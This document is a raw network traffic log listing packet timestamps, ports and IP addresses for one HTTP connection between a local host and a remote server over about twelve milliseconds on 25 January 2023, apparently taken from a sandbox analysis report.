Jan 25, 2023 09:28:21.118973970 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.119019985 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.119066000 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.119111061 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.119133949 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.119180918 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.119220972 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.119254112 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.119304895 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.119326115 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.119371891 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.119422913 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.119473934 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.119493961 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.119533062 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.119560957 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.119610071 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.119657993 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.119704008 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.119723082 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.119766951 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.119787931 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.119843006 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.119896889 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.119949102 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.119982958 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.120014906 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.120048046 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.120099068 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.120147943 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.120197058 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.120215893 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.120251894 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.120285034 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.120335102 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.120387077 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.120435953 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.120474100 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.120506048 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.120548010 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.120548010 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.120580912 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.120604992 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.120646954 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.120697021 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.120723009 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.120763063 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.120784044 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.120832920 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.120879889 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.120930910 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.120966911 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.120986938 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.121018887 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.121067047 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.121110916 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.121149063 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.121179104 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.121227980 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.121274948 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.121311903 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.121339083 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.121360064 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.121406078 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.121454000 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.121500969 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.121520042 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.121571064 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.121584892 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.121629000 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.121675968 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.121723890 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.121747971 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.121782064 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.121810913 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.121859074 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.121906996 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.121952057 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.121972084 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.122018099 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.122064114 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.122085094 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.122137070 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.122149944 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.122194052 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.122241020 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.122289896 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.122308969 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.122356892 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.122376919 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.122420073 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.122467995 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.122514963 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.122536898 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.122575998 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.122601032 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.122649908 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.122714996 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.122765064 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.122785091 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.122836113 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.122850895 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.122896910 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.122946024 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.122992992 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.123039961 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.123063087 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.123105049 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.123131037 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.123194933 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.123248100 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.123267889 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.123307943 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.123333931 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.123382092 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.123430014 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.123459101 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.123507977 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.123620033 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.123667955 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.123716116 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.123764992 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.123817921 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.123831987 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.123867035 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.123897076 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.123946905 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.123994112 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.124017954 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.124067068 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.124116898 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.124171972 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.124187946 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.124222994 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.124255896 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.124304056 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.124350071 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.124404907 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.124418974 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.124454021 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.124485970 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.124531984 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.124579906 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.124614000 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.124674082 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.124697924 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.124699116 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.124768019 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.124818087 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.124866009 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.124886036 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.124941111 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.124984980 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.125029087 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.125075102 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.125128031 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.125142097 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.125176907 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.125206947 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.125252962 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.125298023 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.125349045 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.125363111 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.125396967 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.125430107 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.125478029 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.125524998 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.125574112 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.125592947 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.125639915 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.125658989 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.125705957 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.125754118 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.125798941 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.125819921 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.125866890 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.125901937 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.125940084 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.125988007 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.126034975 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.126055002 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.126087904 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.126117945 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.126168013 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.126216888 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.126271009 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.126286030 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.126317978 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.126352072 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.126399040 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.126445055 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.126498938 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.126513958 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.126545906 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.127088070 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.127139091 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.127187014 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.127250910 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.127270937 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.127324104 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.127341032 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.127386093 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.127433062 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.127512932 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.127796888 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.127854109 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.127878904 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.127908945 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.127944946 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.127993107 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.128015041 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.128051043 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.128077984 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.128127098 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.128154993 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.128209114 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.128226042 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.128271103 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.128293037 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.128340960 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.128360987 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.128407001 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.128428936 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.128482103 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.128495932 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.128529072 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.128561974 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.128642082 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.128655910 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.128696918 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.128721952 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.128767967 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.128787994 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.128835917 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.128882885 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.128905058 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.128947020 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.128968000 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.129021883 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.129035950 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.129076958 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.129103899 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.129152060 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.129173040 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.129209995 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.129239082 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.129292965 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.129307985 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.129339933 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.129371881 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.129420042 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.129442930 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.129491091 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.129511118 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.129555941 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.129580021 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.129625082 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.129646063 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.129689932 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.129714966 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.129761934 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.129784107 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.129836082 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.129851103 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.129903078 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.129921913 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.129961014 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.129985094 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.130038977 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.130053997 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.130091906 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.130115986 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.130170107 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.130183935 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.130215883 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.130249023 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.130294085 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.130314112 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.130358934 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.130381107 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.130426884 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.130450010 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.130494118 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.130515099 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.130558014 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.130582094 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.130625963 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.130647898 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.130716085 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.130734921 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.130789995 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.130840063 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.130861998 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.130889893 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.130928040 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.130973101 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.130995035 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.131040096 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.131062031 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.131107092 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.131129026 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.131175995 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.131198883 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.131227016 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.131263018 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.131309032 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.131320000 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.131340027 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.131350994 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.131369114 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.131378889 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.131397963 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.131407976 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.131427050 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.131436110 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.131455898 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.131465912 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.131484985 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.131494999 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.131511927 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.131522894 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.131541014 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.131551981 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.131572008 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.131581068 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.131599903 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.131609917 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.131628990 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.131639957 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.131659031 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.131669998 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.131688118 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.131699085 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.131717920 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.131727934 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.131747007 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.131757975 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.131777048 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.131787062 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.131807089 CET	80	49736	188.114.96.3	192.168.2.4
